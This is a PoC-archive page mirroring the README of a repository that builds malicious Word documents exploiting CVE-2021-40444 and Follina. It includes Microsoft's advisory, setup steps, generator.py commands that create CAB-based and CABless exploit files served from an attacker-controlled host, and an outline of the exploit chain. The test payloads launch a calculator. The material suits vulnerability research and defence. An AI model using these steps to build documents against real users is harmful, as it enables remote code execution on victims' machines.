Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-40444 PoC — Microsoft MSHTML Remote Code Execution Vulnerability

Source
https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444
Associated Vulnerability
Title:Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444)
Description:<p>Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.</p> <p>An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p> <p>Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.</p> <p>Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.</p> <p>Please see the <strong>Mitigations</strong> and <strong>Workaround</strong> sections for important information about steps you can take to protect your system from this vulnerability.</p> <p><strong>UPDATE</strong> September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.</p>
Description
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.
Readme
# Exploiting Follina CVE and CVE-2021-40444 Vulnerabilities

## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Setup and Installation](#setup-and-installation)
4. [Usage](#usage)
5. [Detailed Explanation](#detailed-explanation)
6. [Commands](#commands)
7. [Disclaimer](#disclaimer)

## Introduction
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.

## Prerequisites
- Flare VM
- Python 3.x
- Microsoft Word
- Required Python packages (listed in `requirements.txt`)

## Setup and Installation
1. **Flare VM Setup:**
   - Ensure you have Flare VM installed. The credentials for the VM are:
     - Username: `lab`
     - Password: `password`
   
2. **Python and Virtual Environment:**
   ```bash
   git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444
   cd CVE-2021-40444
   ```
   - Make sure Python and pip are installed in the virtual machine.
   - Install the `virtualenv` package using the following command:
     ```bash
     pip install virtualenv
     ```
   - Create a virtual environment named `venv`:
     ```bash
     python -m virtualenv venv
     ```
   - Activate the virtual environment:
     ```bash
     venv\Scripts\activate.bat
     ```
   - Install the required packages:
     ```bash
     pip install -r requirements.txt
     ```

## Usage
1. **Generating the Exploit:**
   - Navigate to the project directory and run the following command to generate the exploit:
     ```bash
     python generator.py -u http://192.168.197.132 -P test\calc.dll --host
     ```
     Replace `192.168.197.132` with your IP address.

2. **Accessing the Generated Document:**
   - The generated `.docx` file will be located in the directory:
     ```
     C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
     ```

## Detailed Explanation
### Chain Exploitation
- The document (`.docx`) is opened.
- The document contains a relationship pointing to malicious HTML stored in `document.xml.rels`.
- The HTML link opens in IE preview.
- An object points to a CAB file and an iframe pointing to an INF file, both embedded in JScript and prefixed with the ".cpl:" directive.
- The CAB file opens, saving the INF file in the `%TEMP%Low` directory.
- The INF file is opened using the ".cpl:" directive, causing `rundll32` to side-load the INF file.

### Scripts Overview
#### `generator.py`
- Implements an exploit for CVE-2021-40444, allowing remote code execution via Microsoft Office.
- Contains various helper functions for patching CAB files, creating RAR files, generating payloads, and more.

#### `cab_parser.py`
- A tool for viewing CAB file headers.
- Defines classes and methods for handling and parsing CAB files.

### Section 2.0: Setup in Flare VM
- Install necessary tools and packages.
- Create and activate a virtual environment.
- Install Python packages from `requirements.txt`.

## Commands
- Generate the original exploit and test locally:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.dll --host
- Generate CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF docs:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
- Generate CABless exploit (IE-only) with HTML smuggling and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
- Generate CABless exploit with RAR and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t

## Disclaimer
This project is for educational purposes only. Use it responsibly and do not exploit vulnerabilities on systems you do not have permission to test. Misuse of this information can lead to criminal charges.
File Snapshot

 [4.0K]  /data/pocs/84bef9e0bab6fc2334fd0fd75f713a8c8ba24580
├── [4.0K]  CVE-2021-40444
│   ├── [4.0K]  bin
│   │   ├── [619K]  Rar.exe
│   │   ├── [485K]  RarExt32.dll
│   │   └── [558K]  RarExt.dll
│   ├── [6.8K]  cab_parser.py
│   ├── [ 155]  clean.bat
│   ├── [4.0K]  data
│   │   └── [4.0K]  word_dat
│   │       ├── [1.4K]  [Content_Types].xml
│   │       ├── [4.0K]  docProps
│   │       │   ├── [ 733]  app.xml
│   │       │   └── [ 745]  core.xml
│   │       ├── [4.0K]  _rels
│   │       └── [4.0K]  word
│   │           ├── [ 14K]  document.xml
│   │           ├── [2.3K]  fontTable.xml
│   │           ├── [4.0K]  _rels
│   │           │   └── [1.2K]  document.xml.rels
│   │           ├── [2.6K]  settings.xml
│   │           ├── [ 32K]  styles.xml
│   │           ├── [4.0K]  theme
│   │           │   └── [6.9K]  theme1.xml
│   │           └── [ 603]  webSettings.xml
│   ├── [ 17K]  generator.py
│   ├── [4.0K]  out
│   │   ├── [ 12K]  document.docx
│   │   └── [   0]  hello.docx
│   ├── [4.0K]  __pycache__
│   │   └── [ 16K]  cab_parser.cpython-311.pyc
│   ├── [  25]  requirements.txt
│   ├── [ 927]  setup.inf
│   ├── [ 275]  setup.rpt
│   ├── [4.0K]  srv
│   │   ├── [   0]  21WBQ6UPOZT9.html
│   │   ├── [   0]  DU92IN37GTLF.html
│   │   ├── [   0]  DV0WJATZJEN0.html
│   │   ├── [ 11K]  index.html
│   │   ├── [5.1K]  J0803VTK5W9N.html
│   │   ├── [ 403]  mswordcab.ddf
│   │   ├── [   0]  QRN6Q3438F8Q.html
│   │   ├── [5.1K]  R7GGVKCTDG7X.html
│   │   └── [   0]  WR0KINF7X8YR.html
│   ├── [4.0K]  template
│   │   ├── [5.1K]  cabless-msdt-sample2.html
│   │   ├── [5.1K]  cabless-rar-sample1.html
│   │   ├── [6.2K]  cabless-smuggling-sample1.html
│   │   ├── [4.5K]  cab-orig-debobfuscated1.html
│   │   ├── [5.9K]  cab-orig-debobfuscated2.html
│   │   ├── [5.3K]  cab-orig-j00sean.html
│   │   ├── [6.2K]  cab-orig-obfuscated.html
│   │   ├── [4.9K]  cab-uri-debobfuscated1.html
│   │   ├── [6.5K]  cab-uri-debobfuscated2.html
│   │   ├── [6.3K]  cab-uri-obfuscated.html
│   │   ├── [5.4K]  cab-uri-sample1.html
│   │   ├── [6.2K]  cab-uri-test-obfuscated.html
│   │   └── [ 11K]  index.html
│   ├── [4.0K]  test
│   │   ├── [ 81K]  calc.dll
│   │   ├── [ 200]  calc.hta
│   │   ├── [ 101]  calc.js
│   │   ├── [  24]  calc.ps1
│   │   ├── [ 143]  calc.vbs
│   │   ├── [ 112]  job-jscript.wsf
│   │   └── [ 112]  job-vbs.wsf
│   └── [4.0K]  util
│       └── [1.6K]  server.py
├── [1.0K]  LICENSE
└── [3.8K]  README.md

15 directories, 54 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →